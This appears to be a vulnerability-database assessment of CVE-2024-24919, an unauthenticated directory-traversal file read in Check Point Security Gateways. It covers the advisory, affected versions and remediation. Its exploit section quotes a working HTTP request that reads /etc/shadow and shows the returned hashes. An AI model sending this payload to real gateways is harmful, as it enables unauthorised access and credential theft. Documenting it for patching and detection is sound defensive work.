Very High
CVE-2024-24919
CVE-2024-24919
Description
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.
Add Assessment
Technical Analysis
On May 28, 2024, Check Point published an advisory for an unauthenticated information disclosure vulnerability affecting Check Point Security Gateway devices configured with either the “IPSec VPN” or “Mobile Access” software blade. This vulnerability was stated as being a vulnerability impacting devices with password-only authentication enabled on some accounts. However, upon analysis, CVE-2024-24919 was discovered to be an unauthenticated arbitrary file read as root. Though attackers may steal credential files to crack account password hashes, CVE-2024-24919 also impacts systems that are not configured for password-only authentication.
This vulnerability should be urgently addressed by anyone running a Check Point Security Gateway with the IPSec VPN or Mobile Access blades enabled. Additionally, organizations should reference the Rapid7 blog post for this vulnerability for remediation and detection recommendations. As of May 30, 2024, CVE-2024-24919 has been added to CISA’s KEV catalog.
Technical Analysis
This is trivial to exploit. The vulnerability at its core is a directory traversal vulnerability that allows for full access to files on the Check Point VPN device/service. It also appears that this an unauthenticated vulnerability and given that these servers will by their very nature be publicly exposed, significantly increases the risk of this vulnerability.
Exploit
The exploit itself, as mentioned above is trivial to exploit. An example is shown on https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/:
Request
POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow
Response
HTTP/1.0 200 OK Date: Thu, 30 May 2024 01:38:29 GMT Server: Check Point SVN foundation Content-Type: text/html X-UA-Compatible: IE=EmulateIE7 Connection: close X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 505 admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8::: monitor:*:19872:0:99999:8::: root:*:19872:0:99999:7::: nobody:*:19872:0:99999:7::: postfix:*:19872:0:99999:7::: rpm:!!:19872:0:99999:7::: shutdown:*:19872:0:99999:7::: pcap:!!:19872:0:99999:7::: halt:*:19872:0:99999:7::: cp_postgres:*:19872:0:99999:7::: cpep_user:*:19872:0:99999:7::: vcsa:!!:19872:0:99999:7::: _nonlocl:*:19872:0:99999:7::: sshd:*:19872:0:99999:7:::
Using this, an attacker would be able to gain access to sensitive data on the server, such as the configuration for the VPN service.
CVSS V3 Severity and Metrics
General Information
Vendors
- checkpoint
Products
- cloudguard network security r80.40,
- cloudguard network security r81.0,
- cloudguard network security r81.10,
- cloudguard network security r81.20,
- quantum security gateway firmware r80.40,
- quantum security gateway firmware r81.0,
- quantum security gateway firmware r81.10,
- quantum security gateway firmware r81.20,
- quantum spark firmware r80.20,
- quantum spark firmware r81.10
Exploited in the Wild
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Miscellaneous
